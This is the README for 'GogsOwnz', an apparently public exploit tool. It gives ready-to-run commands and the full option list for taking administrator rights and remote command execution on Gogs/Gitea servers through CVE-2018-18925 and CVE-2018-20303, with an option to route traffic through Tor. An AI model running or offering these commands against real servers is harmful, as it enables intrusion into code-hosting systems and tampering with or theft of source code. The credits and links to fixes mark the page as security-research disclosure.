GogsOwnz is a simple script to gain administrator rights and RCE on a Gogs/Gitea server.
It exploits vulnerabilities in Gogs/Gitea, including CVE-2018-18925 and CVE-2018-20303.
Legal Disclaimer
This script is offered as is. No warranty; use at your own risk, and please obey the law.
Get info about Gogs/Gitea running
python3 gogsownz.py https://127.0.0.1:3000/ -v --info
Exploit preauth PrivEsc
python3 gogsownz.py https://127.0.0.1:3000/ -v --preauth
Exploit PrivEsc
python3 gogsownz.py https://127.0.0.1:3000/ -v -C '<user>:<password>' --cleanup
or alternatively
python3 gogsownz.py https://127.0.0.1:3000/ -v -c '<i_like_gogs_cookie>' --cleanup
Exploit preauth RCE
python3 gogsownz.py https://127.0.0.1:3000/ -v --preauth --rce 'sleep 10' --cleanup
Exploit auth RCE
python3 gogsownz.py https://127.0.0.1:3000/ -v -C '<user>:<password>' --rce 'sleep 10' --cleanup
Full usage
usage: gogsownz [-h] [-C CREDS] [-n COOKIENAME] [-c COOKIE] [-i] [--rce RCE]
                [--repo REPO] [--preauth] [--windows] [--cleanup] [--tor]
                [--check-tor] [--burp] [-k] [--verbose]
                url

positional arguments:
  url                   URL for the Gogs server

optional arguments:
  -h, --help            show this help message and exit
  -C CREDS, --creds CREDS
                        Credentials for the Gogs server, in the from
                        "username:password"
  -n COOKIENAME, --cookie-name COOKIENAME
                        Name of the Gogs-specific session cookie
  -c COOKIE, --cookie COOKIE
                        Session for the Gogs server, the value in the
                        i_like_gogits Cookie
  -i, --info            Only detect informations about the running Gogs
                        server, then quit
  --rce RCE             Command to execute on the Gogs server
  --repo REPO           Use an existing repo for the PrivEsc
  --preauth             Try the pre-auth vulnerability
  --windows             Gogs server runs on Windows
  --cleanup             Remove all created repo after exploit
  --tor                 Use tor proxy when performing requests
  --check-tor           Check that Tor is correctly set up before running
  --burp                Use burp proxy when performing requests
  -k, --insecure        Allow insecure server connections when using SSL
  --verbose, -v
Thanks to:
- Tencent Security (@md5_salt, @ma7h1as and @chromium1337)
- PentesterLab (@snyff)
- LuckyC4t
- the gogs security community :D
gogs/gogs#5469
gogs/gogs#5558
https://github.com/gogs/gogs/commit/8c8c37a66b4cef6fc8a995ab1b4fd6e530c49c51
gogs/gogs#5599
https://2018.zeronights.ru/wp-content/uploads/materials/17-Who-owned-your-code.pdf